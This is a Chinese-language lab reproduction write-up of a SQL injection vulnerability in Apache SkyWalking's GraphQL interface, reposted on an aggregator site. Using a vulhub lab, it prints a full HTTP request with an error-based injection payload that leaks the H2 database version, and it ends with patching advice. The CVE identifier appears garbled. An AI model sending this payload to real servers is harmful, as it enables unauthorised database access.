100字范文,内容丰富有趣,生活中的好帮手!
100字范文 > (CVE--9483)ApacheSkyWalking SQL注入 漏洞复现

(CVE--9483)ApacheSkyWalking SQL注入 漏洞复现

时间:2021-08-19 00:20:47

相关推荐

(CVE--9483)ApacheSkyWalking SQL注入 漏洞复现

漏洞信息

漏洞名称

ApacheSkyWalking SQL注入漏洞

漏洞编号

CVE--9483

危害等级

高危

漏洞类型

通用型漏洞

漏洞厂商

Apache

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

先在kali安装docker-compose

然后下载靶场vulhub:

docker-compose up -d

生成靶场环境:

访问8080端口:

环境搭建完成。

漏洞复现

利用burpsuite抓包:

BP抓包,利用报错注入获取版本

POST /graphql HTTP/1.1Host: 192.168.18.149:8080User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/0101 Firefox/78.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 610Origin: http://192.168.18.149:8080Connection: closeReferer: http://192.168.18.149:8080/{"query":"query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}}}","variables":{"condition":{"metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --","endpointId":"1","traceId":"1","state":"ALL","stateCode":"1","paging":{"pageSize":10}}}}

成功返回h2数据库版本信息!

修复建议

1、升级Apache Skywalking 到最新的 v8.4.0 版本。

2、将默认h2数据库替换为其它支持的数据库。

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。